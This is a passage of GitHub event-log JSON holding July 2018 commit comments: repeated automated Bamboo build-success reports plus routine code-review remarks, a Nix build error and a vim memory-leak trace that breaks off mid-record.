{"id":"8000659973","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793877,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-22T18:33:58Z","updated_at":"2018-07-22T18:33:58Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:33:58Z"}
{"id":"8000660516","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29793878,"position":13,"line":128,"path":"code/drasil-lang/Language/Drasil/Classes.hs","commit_id":"0081c9c57865eda8945186d35fc6e8e4408a2bc4","created_at":"2018-07-22T18:34:22Z","updated_at":"2018-07-22T18:34:22Z","author_association":"OWNER","body":"I think that having this as a full `Lens'` is going to lead to difficulties.  Make it just a function, `u -> [UID]`, that will definitely be simpler."}},"created_at":"2018-07-22T18:34:22Z"}
{"id":"8000660807","type":"CommitCommentEvent","actor":{"login":"joshuaaguilar20"},"repo":{"name":"joshuaaguilar20/ReactCalculator1"},"payload":{"comment":{"id":29793880,"position":45,"line":16,"path":"src/app.js","commit_id":"cb7ac96b0dfb1d08262c3b3532ac1216221b481c","created_at":"2018-07-22T18:34:36Z","updated_at":"2018-07-22T18:34:36Z","author_association":"OWNER","body":"they are, for some reason in read it was showing the changed files and in green the ones I added to line 11-15"}},"created_at":"2018-07-22T18:34:36Z"}
{"id":"8000660973","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793881,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-22T18:34:42Z","updated_at":"2018-07-22T18:34:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:34:42Z"}
{"id":"8000661532","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793882,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-22T18:35:09Z","updated_at":"2018-07-22T18:35:09Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:35:09Z"}
{"id":"8000662010","type":"CommitCommentEvent","actor":{"login":"MP2E"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29793883,"position":null,"line":null,"path":null,"commit_id":"6c72782d364149c7cfea1ea69fdbc1133acc80b5","created_at":"2018-07-22T18:35:33Z","updated_at":"2018-07-22T18:35:33Z","author_association":"CONTRIBUTOR","body":"Hmm I think I'm getting an error message when I run nixos-rebuild on this commit but I'll need to git bisect to confirm, here's the error I'm seeing:\r\n\r\n```\r\noutput '/nix/store/hdx90hiz9fi1pgb56jdm2kfyyr8xpaxf-extra-utils' is not allowed to refer to the following paths:\r\n       /nix/store/2b6pmzqay3ipsj1i4ppg3g0jwa9rylbr-libidn2-2.0.5\r\ncannot build derivation '/nix/store/4blb2zvakf0nf5x7i6iwn24ap0q0ybiv-stage-1-init.sh.drv': 1 dependencies couldn't be built\r\ncannot build derivation '/nix/store/5ysgrn8smwp1zrzyd88c1mvhznn0v1jy-initrd.drv': 1 dependencies couldn't be built\r\ncannot build derivation '/nix/store/jg60ks4dgwx1mqym83mcaxyvwpb5szxr-nixos-system-applicative-18.09.git.5da156e.drv': 1 dependencies couldn't be built\r\nerror: build of '/nix/store/jg60ks4dgwx1mqym83mcaxyvwpb5szxr-nixos-system-applicative-18.09.git.5da156e.drv' failed\r\n```"}},"created_at":"2018-07-22T18:35:33Z"}
{"id":"8000662168","type":"CommitCommentEvent","actor":{"login":"saibotma"},"repo":{"name":"lirispp/Exposed"},"payload":{"comment":{"id":29793884,"position":null,"line":null,"path":null,"commit_id":"143b706684a70e8e1e83c3bed221a624160d5cd7","created_at":"2018-07-22T18:35:40Z","updated_at":"2018-07-22T18:35:40Z","author_association":"NONE","body":"Is this working good for you?"}},"created_at":"2018-07-22T18:35:40Z"}
{"id":"8000662417","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793885,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-22T18:35:52Z","updated_at":"2018-07-22T18:35:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:35:52Z"}
{"id":"8000662726","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793886,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-22T18:36:09Z","updated_at":"2018-07-22T18:36:09Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-22T18:36:09Z"}
{"id":"8000662973","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793887,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-22T18:36:19Z","updated_at":"2018-07-22T18:36:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:36:19Z"}
{"id":"8000663113","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793888,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-22T18:36:28Z","updated_at":"2018-07-22T18:36:28Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-22T18:36:28Z"}
{"id":"8000663548","type":"CommitCommentEvent","actor":{"login":"Duality-CDOO"},"repo":{"name":"duality-solutions/Dynamic"},"payload":{"comment":{"id":29793892,"position":111,"line":126,"path":"contrib/gitian-descriptors/gitian-win.yml","commit_id":"1e26ac0e5e1eca276b66082136c456442920eb95","created_at":"2018-07-22T18:36:48Z","updated_at":"2018-07-22T18:36:48Z","author_association":"CONTRIBUTOR","body":"bitcoin or dynamic?\r\n"}},"created_at":"2018-07-22T18:36:48Z"}
{"id":"8000663762","type":"CommitCommentEvent","actor":{"login":"Duality-CDOO"},"repo":{"name":"duality-solutions/Dynamic"},"payload":{"comment":{"id":29793893,"position":3,"line":2,"path":"contrib/gitian-descriptors/gitian-win.yml","commit_id":"1e26ac0e5e1eca276b66082136c456442920eb95","created_at":"2018-07-22T18:36:59Z","updated_at":"2018-07-22T18:36:59Z","author_association":"CONTRIBUTOR","body":"2.3.0.0 ?"}},"created_at":"2018-07-22T18:36:59Z"}
{"id":"8000663826","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793894,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-22T18:37:02Z","updated_at":"2018-07-22T18:37:02Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:37:02Z"}
{"id":"8000664260","type":"CommitCommentEvent","actor":{"login":"Pokechu22"},"repo":{"name":"creeper123123321/ViaVersion"},"payload":{"comment":{"id":29793895,"position":30,"line":231,"path":"common/src/main/java/us/myles/ViaVersion/protocols/protocol1_13to1_12_2/Protocol1_13To1_12_2.java","commit_id":"d577088b8ccf8ee033288de8958ceb84142f4c22","created_at":"2018-07-22T18:37:23Z","updated_at":"2018-07-22T18:37:23Z","author_association":"NONE","body":"I'm not 100% sure this is right; the packet actually has metadata on it as the highest bits (which I only just now found).  Does it work right with colored wool?"}},"created_at":"2018-07-22T18:37:23Z"}
{"id":"8000664408","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793896,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-22T18:37:30Z","updated_at":"2018-07-22T18:37:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:37:30Z"}
{"id":"8000665300","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793897,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-22T18:38:12Z","updated_at":"2018-07-22T18:38:12Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:38:12Z"}
{"id":"8000665423","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"VolodymyrPliuta/gmap-Revamp"},"payload":{"comment":{"id":29793898,"position":42,"line":36,"path":"js/main.js","commit_id":"e178f92dfe9968a4597e379e2fa21ab54b7bda3d","created_at":"2018-07-22T18:38:18Z","updated_at":"2018-07-22T18:38:18Z","author_association":"NONE","body":"interesting, to use \"city\" ... one thing you could add is a landmarks key to the \"SF\" object\r\n\r\nexample:\r\n```javascript\r\nSF: {cityName: 'SanFrancisco', city: {lat: 37.761201, lng: -122.434701}, zoom: 8,\r\nlandmarks: {\r\n    starbucks: {lat: 37.761211, lng: -122.434701}, \r\n    tastyburger: {lat: 37.761201, lng: -122.434720},\r\n    gym: {lat: 37.761201, lng: -122.434711} \r\n}\r\n```"}},"created_at":"2018-07-22T18:38:18Z"}
{"id":"8000665851","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793899,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-22T18:38:39Z","updated_at":"2018-07-22T18:38:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:38:39Z"}
{"id":"8000666470","type":"CommitCommentEvent","actor":{"login":"MASHinfo"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29793900,"position":null,"line":null,"path":null,"commit_id":"13c663f17aea5d715474dfc6a46350c3f6ab6703","created_at":"2018-07-22T18:39:07Z","updated_at":"2018-07-22T18:39:07Z","author_association":"CONTRIBUTOR","body":"You changed in MACHINE_CONFIG_START(draco_state::draco)\r\n\r\nMCFG_DEVICE_ADD(CDP1802_TAG, CDP1802, DRACO_CHR1)\r\nto\r\ncdp1802_device &cpu(CDP1802(config, CDP1802_TAG, ALTAIR_CHR1));\r\n\r\nBut i think it must be\r\ncdp1802_device &cpu(CDP1802(config, CDP1802_TAG, DRACO_CHR1));"}},"created_at":"2018-07-22T18:39:07Z"}
{"id":"8000666870","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793901,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-22T18:39:26Z","updated_at":"2018-07-22T18:39:26Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:39:26Z"}
{"id":"8000667438","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793902,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-22T18:39:52Z","updated_at":"2018-07-22T18:39:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:39:52Z"}
{"id":"8000668423","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793904,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-22T18:40:38Z","updated_at":"2018-07-22T18:40:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:40:38Z"}
{"id":"8000668551","type":"CommitCommentEvent","actor":{"login":"crossan007"},"repo":{"name":"ChurchCRM/CRM"},"payload":{"comment":{"id":29793905,"position":5,"line":102,"path":"src/views/email/BaseEmail.html","commit_id":"7541ec2a516b4285c9aaa7200a10a2004fc1081d","created_at":"2018-07-22T18:40:43Z","updated_at":"2018-07-22T18:40:43Z","author_association":"NONE","body":"use `SystemService::getCopyrightDate()` https://github.com/ChurchCRM/CRM/commit/cce95fc3debb0b505bdd2542b63e029d3b1cb08c#diff-ee46a8c5ae89c0cb77e12368c128f4d5R6"}},"created_at":"2018-07-22T18:40:43Z"}
{"id":"8000668740","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/electrs"},"payload":{"comment":{"id":29793906,"position":null,"line":null,"path":null,"commit_id":"321d655d7a2d66b1be5fba83977098ec378f999c","created_at":"2018-07-22T18:40:51Z","updated_at":"2018-07-22T18:40:51Z","author_association":"OWNER","body":"(#25 )"}},"created_at":"2018-07-22T18:40:51Z"}
{"id":"8000669016","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793907,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-22T18:41:02Z","updated_at":"2018-07-22T18:41:02Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:41:02Z"}
{"id":"8000669167","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/electrs"},"payload":{"comment":{"id":29793908,"position":null,"line":null,"path":null,"commit_id":"b83b0718dd251899436e0d28ed77172787161a77","created_at":"2018-07-22T18:41:09Z","updated_at":"2018-07-22T18:41:09Z","author_association":"OWNER","body":"#25 "}},"created_at":"2018-07-22T18:41:09Z"}
{"id":"8000669303","type":"CommitCommentEvent","actor":{"login":"joshuaaguilar20"},"repo":{"name":"joshuaaguilar20/ReactCalculator1"},"payload":{"comment":{"id":29793909,"position":203,"line":65,"path":"src/app.js","commit_id":"cb7ac96b0dfb1d08262c3b3532ac1216221b481c","created_at":"2018-07-22T18:41:15Z","updated_at":"2018-07-22T18:41:15Z","author_association":"OWNER","body":"Going to change that now for sure. "}},"created_at":"2018-07-22T18:41:15Z"}
{"id":"8000669965","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793910,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-22T18:41:48Z","updated_at":"2018-07-22T18:41:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:41:48Z"}
{"id":"8000670509","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793911,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-22T18:42:13Z","updated_at":"2018-07-22T18:42:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:42:13Z"}
{"id":"8000670973","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":29793912,"position":null,"line":null,"path":null,"commit_id":"ad6480961080f80a455b2394f27b02935a2ded52","created_at":"2018-07-22T18:42:34Z","updated_at":"2018-07-22T18:42:34Z","author_association":"NONE","body":"@brammool \r\nThanks for looking into this!\r\n\r\n> Are you saying that before the patch your code worked OK?\r\n\r\nYes, I've git-bisected it to this commit.\r\n\r\n> Hmm, maybe you are redefining the function after using it?\r\n> Maybe this change helps (just guessing!):\r\n\r\nYes, that fixes it.\r\nTwo of the 3 profile files say \"Sourced 2 times\", so the function get redefined - this is due to how the tests are setup, and I am using `getpid()` in the profile filename already, to handle the multiple processes.\r\n\r\nI've tried an ASAN build, and one of the logs (after this one-line-patch) shows:\r\n\r\n```\r\n==9675==ERROR: LeakSanitizer: detected memory leaks\r\n\r\nDirect leak of 20000 byte(s) in 1 object(s) allocated from:\r\n    #0 0x7f92d67c7219 in __interceptor_realloc /build/gcc/src/gcc/libsanitizer/asan/asan_malloc_linux.cc:105\r\n    #1 0x55b8e93ea950  (/home/user/.local/opt/vim/bin/vim+0x2ea950)\r\n    #2 0x55b8e92e6072  (/home/user/.local/opt/vim/bin/vim+0x1e6072)\r\n    #3 0x55b8e92e69e8  (/home/user/.local/opt/vim/bin/vim+0x1e69e8)\r\n    #4 0x55b8e95f6786  (/home/user/.local/opt/vim/bin/vim+0x4f6786)\r\n    #5 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #6 0x55b8e92e7a2b  (/home/user/.local/opt/vim/bin/vim+0x1e7a2b)\r\n    #7 0x55b8e92e87bd  (/home/user/.local/opt/vim/bin/vim+0x1e87bd)\r\n    #8 0x55b8e92e471a  (/home/user/.local/opt/vim/bin/vim+0x1e471a)\r\n    #9 0x55b8e92e4bdf  (/home/user/.local/opt/vim/bin/vim+0x1e4bdf)\r\n    #10 0x55b8e92e4d62  (/home/user/.local/opt/vim/bin/vim+0x1e4d62)\r\n    #11 0x55b8e92e4d90  